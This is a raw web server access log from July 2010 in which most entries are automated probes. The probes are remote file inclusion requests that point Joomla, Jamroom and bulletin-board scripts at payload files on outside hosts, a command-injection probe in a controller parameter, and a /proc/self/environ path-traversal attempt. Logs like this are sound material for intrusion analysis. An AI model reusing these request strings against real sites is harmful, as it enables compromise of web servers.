211.169.249.251 - - [20/Jul/2010:02:21:52 -0700] "GET /logs/?option=com_ckforms&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 200 1939 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.redneckmba.com"
211.169.249.251 - - [20/Jul/2010:02:21:52 -0700] "GET /?option=com_ckforms&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 200 779 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.redneckmba.com"
64.207.204.37 - - [20/Jul/2010:02:22:31 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.myjpconnelly.com/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
74.55.73.74 - - [20/Jul/2010:02:22:31 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.myjpconnelly.com/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "redneckmba.com"
64.207.204.37 - - [20/Jul/2010:02:25:25 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.myjpconnelly.com/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
64.207.204.37 - - [20/Jul/2010:02:25:25 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.myjpconnelly.com/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
64.207.204.37 - - [20/Jul/2010:02:25:25 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.myjpconnelly.com/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
74.55.73.74 - - [20/Jul/2010:02:25:40 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.myjpconnelly.com/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
74.55.73.74 - - [20/Jul/2010:02:25:40 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.myjpconnelly.com/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
74.55.73.74 - - [20/Jul/2010:02:25:40 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.myjpconnelly.com/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
81.21.78.22 - - [20/Jul/2010:02:25:41 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.myjpconnelly.com/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "redneckmba.com"
76.13.123.194 - - [20/Jul/2010:02:29:19 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
81.21.78.22 - - [20/Jul/2010:02:34:54 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.myjpconnelly.com/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
81.21.78.22 - - [20/Jul/2010:02:34:54 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.myjpconnelly.com/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
81.21.78.22 - - [20/Jul/2010:02:34:54 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.myjpconnelly.com/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
212.241.251.207 - - [20/Jul/2010:02:36:37 -0700] "GET /logs/access.log/index.php?option=com_sef&Itemid=&mosConfig.absolute.pathhttp://www.businessregeneration.co.uk/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
212.241.251.207 - - [20/Jul/2010:02:36:38 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.pathhttp://www.businessregeneration.co.uk/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
212.241.251.207 - - [20/Jul/2010:02:36:39 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.pathhttp://www.businessregeneration.co.uk/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
62.113.86.26 - - [20/Jul/2010:02:40:26 -0700] "GET /index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://www.treadmil-l.com/wp-content/upgrade/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.814" "redneckmba.com"
76.13.114.107 - - [20/Jul/2010:02:46:05 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
94.124.120.23 - - [20/Jul/2010:02:47:38 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.dukhi.co.uk/includes/PEAR/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
94.124.120.23 - - [20/Jul/2010:02:47:38 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.dukhi.co.uk/includes/PEAR/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
94.124.120.23 - - [20/Jul/2010:02:47:38 -0700] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.dukhi.co.uk/includes/PEAR/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
94.124.120.23 - - [20/Jul/2010:02:47:39 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.dukhi.co.uk/includes/PEAR/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
94.124.120.23 - - [20/Jul/2010:02:47:39 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.dukhi.co.uk/includes/PEAR/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
94.124.120.23 - - [20/Jul/2010:02:47:39 -0700] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.dukhi.co.uk/includes/PEAR/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
212.241.251.207 - - [20/Jul/2010:02:56:08 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.pathhttp://www.businessregeneration.co.uk/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
212.241.251.207 - - [20/Jul/2010:02:56:09 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.pathhttp://www.businessregeneration.co.uk/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
74.55.73.74 - - [20/Jul/2010:02:59:41 -0700] "GET /logs/access_100607.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.myjpconnelly.com/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "redneckmba.com"
74.55.73.74 - - [20/Jul/2010:02:59:41 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.myjpconnelly.com/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "redneckmba.com"
74.55.73.74 - - [20/Jul/2010:02:59:41 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.myjpconnelly.com/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "redneckmba.com"
64.207.204.37 - - [20/Jul/2010:02:59:44 -0700] "GET /logs/access_100607.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.myjpconnelly.com/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
64.207.204.37 - - [20/Jul/2010:02:59:45 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.myjpconnelly.com/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
64.207.204.37 - - [20/Jul/2010:02:59:45 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.myjpconnelly.com/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
66.163.171.205 - - [20/Jul/2010:03:08:23 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
81.21.78.22 - - [20/Jul/2010:03:11:00 -0700] "GET /logs/access_100531.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.myjpconnelly.com/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "redneckmba.com"
81.21.78.22 - - [20/Jul/2010:03:11:00 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.myjpconnelly.com/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "redneckmba.com"
81.21.78.22 - - [20/Jul/2010:03:11:00 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.myjpconnelly.com/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "redneckmba.com"
62.8.142.180 - - [20/Jul/2010:03:13:56 -0700] "GET ///index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "redneckmba.com"
195.42.120.131 - - [20/Jul/2010:03:32:32 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.net-games.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
195.42.120.131 - - [20/Jul/2010:03:32:32 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.net-games.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
195.42.120.131 - - [20/Jul/2010:03:32:32 -0700] "GET /logs/access_100531.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.net-games.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.114.106 - - [20/Jul/2010:03:34:42 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
62.8.142.180 - - [20/Jul/2010:03:35:46 -0700] "GET /logs/access_100531.log////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "redneckmba.com"
62.8.142.180 - - [20/Jul/2010:03:35:46 -0700] "GET ///index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "redneckmba.com"
62.8.142.180 - - [20/Jul/2010:03:35:46 -0700] "GET /logs////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "redneckmba.com"
66.249.71.214 - - [20/Jul/2010:03:37:08 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "redneckmba.com"
66.249.71.214 - - [20/Jul/2010:03:37:09 -0700] "GET /logs/access_100412.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "redneckmba.com"
38.96.198.32 - - [20/Jul/2010:03:43:12 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
38.96.198.32 - - [20/Jul/2010:03:43:12 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
38.96.198.32 - - [20/Jul/2010:03:43:12 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
211.169.249.251 - - [20/Jul/2010:03:48:14 -0700] "GET /logs/access.log/?option=com_ckforms&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.redneckmba.com"
211.169.249.251 - - [20/Jul/2010:03:48:14 -0700] "GET /?option=com_ckforms&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.redneckmba.com"
211.169.249.251 - - [20/Jul/2010:03:48:14 -0700] "GET /logs/?option=com_ckforms&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 200 1939 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.redneckmba.com"
211.169.249.251 - - [20/Jul/2010:03:48:14 -0700] "GET /logs/access.log/?option=com_ckforms&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.redneckmba.com"
211.169.249.251 - - [20/Jul/2010:03:48:14 -0700] "GET /?option=com_ckforms&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 200 779 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.redneckmba.com"
211.169.249.251 - - [20/Jul/2010:03:48:14 -0700] "GET /logs/?option=com_ckforms&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 200 1939 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.redneckmba.com"
76.13.123.195 - - [20/Jul/2010:03:50:27 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
195.42.120.131 - - [20/Jul/2010:03:51:35 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.net-games.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
195.42.120.131 - - [20/Jul/2010:03:51:35 -0700] "GET /logs/access_100531.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.net-games.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
195.42.120.131 - - [20/Jul/2010:03:51:38 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.net-games.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
213.171.37.206 - - [20/Jul/2010:04:07:40 -0700] "GET /logs/access_100531.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "redneckmba.com"
213.171.37.206 - - [20/Jul/2010:04:07:40 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "redneckmba.com"
213.171.37.206 - - [20/Jul/2010:04:07:40 -0700] "GET /logs/access_100607.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "redneckmba.com"
213.171.37.206 - - [20/Jul/2010:04:07:40 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "redneckmba.com"
66.163.171.207 - - [20/Jul/2010:04:07:49 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
195.42.120.131 - - [20/Jul/2010:04:08:51 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.net-games.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
195.42.120.131 - - [20/Jul/2010:04:08:51 -0700] "GET /logs/access_100531.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.net-games.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
195.42.120.131 - - [20/Jul/2010:04:08:51 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.net-games.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.191.115.202 - - [20/Jul/2010:04:11:29 -0700] "GET /board/bbs//write_comment_update.php?board_skin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.191.115.202 - - [20/Jul/2010:04:11:29 -0700] "GET /logs//board/bbs//write_comment_update.php?board_skin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.191.115.202 - - [20/Jul/2010:04:11:29 -0700] "GET /logs/access.log%20%20//board/bbs//write_comment_update.php?board_skin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.191.115.202 - - [20/Jul/2010:04:12:28 -0700] "GET /logs/access.log%20%20//board/bbs//write_comment_update.php?board_skin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.191.115.202 - - [20/Jul/2010:04:12:28 -0700] "GET /board/bbs//write_comment_update.php?board_skin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.191.115.202 - - [20/Jul/2010:04:12:28 -0700] "GET /logs//board/bbs//write_comment_update.php?board_skin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.191.115.202 - - [20/Jul/2010:04:12:32 -0700] "GET /board/bbs//write_comment_update.php?board_skin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.191.115.202 - - [20/Jul/2010:04:12:32 -0700] "GET /logs//board/bbs//write_comment_update.php?board_skin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.191.115.202 - - [20/Jul/2010:04:12:32 -0700] "GET /logs/access.log%20%20//board/bbs//write_comment_update.php?board_skin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.191.115.202 - - [20/Jul/2010:04:21:31 -0700] "GET /logs/access.log//board/bbs//write_comment_update.php?board_skin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.191.115.202 - - [20/Jul/2010:04:22:20 -0700] "GET /logs/access.log//board/bbs//write_comment_update.php?board_skin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.191.115.202 - - [20/Jul/2010:04:22:28 -0700] "GET /logs/access.log//board/bbs//write_comment_update.php?board_skin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.114.106 - - [20/Jul/2010:04:30:53 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
62.113.86.26 - - [20/Jul/2010:04:51:46 -0700] "GET /index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://www.treadmil-l.com/wp-content/upgrade/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.814" "redneckmba.com"
76.74.254.196 - - [20/Jul/2010:05:02:01 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.thw-recklinghausen.de//e107_themes/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.74.254.196 - - [20/Jul/2010:05:02:01 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.thw-recklinghausen.de//e107_themes/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.74.254.196 - - [20/Jul/2010:05:02:01 -0700] "GET /logs/access.log%20%20//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.thw-recklinghausen.de//e107_themes/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.74.254.196 - - [20/Jul/2010:05:09:25 -0700] "GET /logs/access.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.thw-recklinghausen.de//e107_themes/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
66.163.171.207 - - [20/Jul/2010:05:13:19 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.123.194 - - [20/Jul/2010:05:17:51 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
211.169.249.251 - - [20/Jul/2010:05:17:54 -0700] "GET /?option=com_ckforms&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.redneckmba.com"
211.169.249.251 - - [20/Jul/2010:05:17:54 -0700] "GET /logs/access.log/?option=com_ckforms&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.redneckmba.com"
211.169.249.251 - - [20/Jul/2010:05:17:54 -0700] "GET /logs/?option=com_ckforms&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 200 1939 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.redneckmba.com"
211.169.249.251 - - [20/Jul/2010:05:17:54 -0700] "GET /?option=com_ckforms&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 200 779 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.redneckmba.com"
211.169.249.251 - - [20/Jul/2010:05:17:54 -0700] "GET /logs/access.log/?option=com_ckforms&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.redneckmba.com"
211.169.249.251 - - [20/Jul/2010:05:17:54 -0700] "GET /logs/?option=com_ckforms&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 200 1939 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.redneckmba.com"
67.218.116.168 - - [20/Jul/2010:05:25:00 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.redneckmba.com"
122.201.82.173 - - [20/Jul/2010:05:25:34 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "redneckmba.com"
122.201.82.173 - - [20/Jul/2010:05:25:34 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "redneckmba.com"
122.201.82.173 - - [20/Jul/2010:05:25:34 -0700] "GET /logs/access_100531.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "redneckmba.com"
76.13.114.105 - - [20/Jul/2010:05:31:43 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
207.46.13.91 - - [20/Jul/2010:05:31:57 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.redneckmba.com"
207.46.13.91 - - [20/Jul/2010:05:32:52 -0700] "GET /?D=A HTTP/1.1" 200 779 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.redneckmba.com"
148.211.1.5 - - [20/Jul/2010:05:41:21 -0700] "GET /logs/access.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.net-games.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
148.211.1.5 - - [20/Jul/2010:05:41:21 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.net-games.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
148.211.1.5 - - [20/Jul/2010:05:41:22 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.net-games.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
148.211.1.5 - - [20/Jul/2010:05:41:44 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.net-games.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
148.211.1.5 - - [20/Jul/2010:05:41:44 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.net-games.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
148.211.1.5 - - [20/Jul/2010:05:41:44 -0700] "GET /logs/access.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.net-games.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
66.163.171.206 - - [20/Jul/2010:06:28:17 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
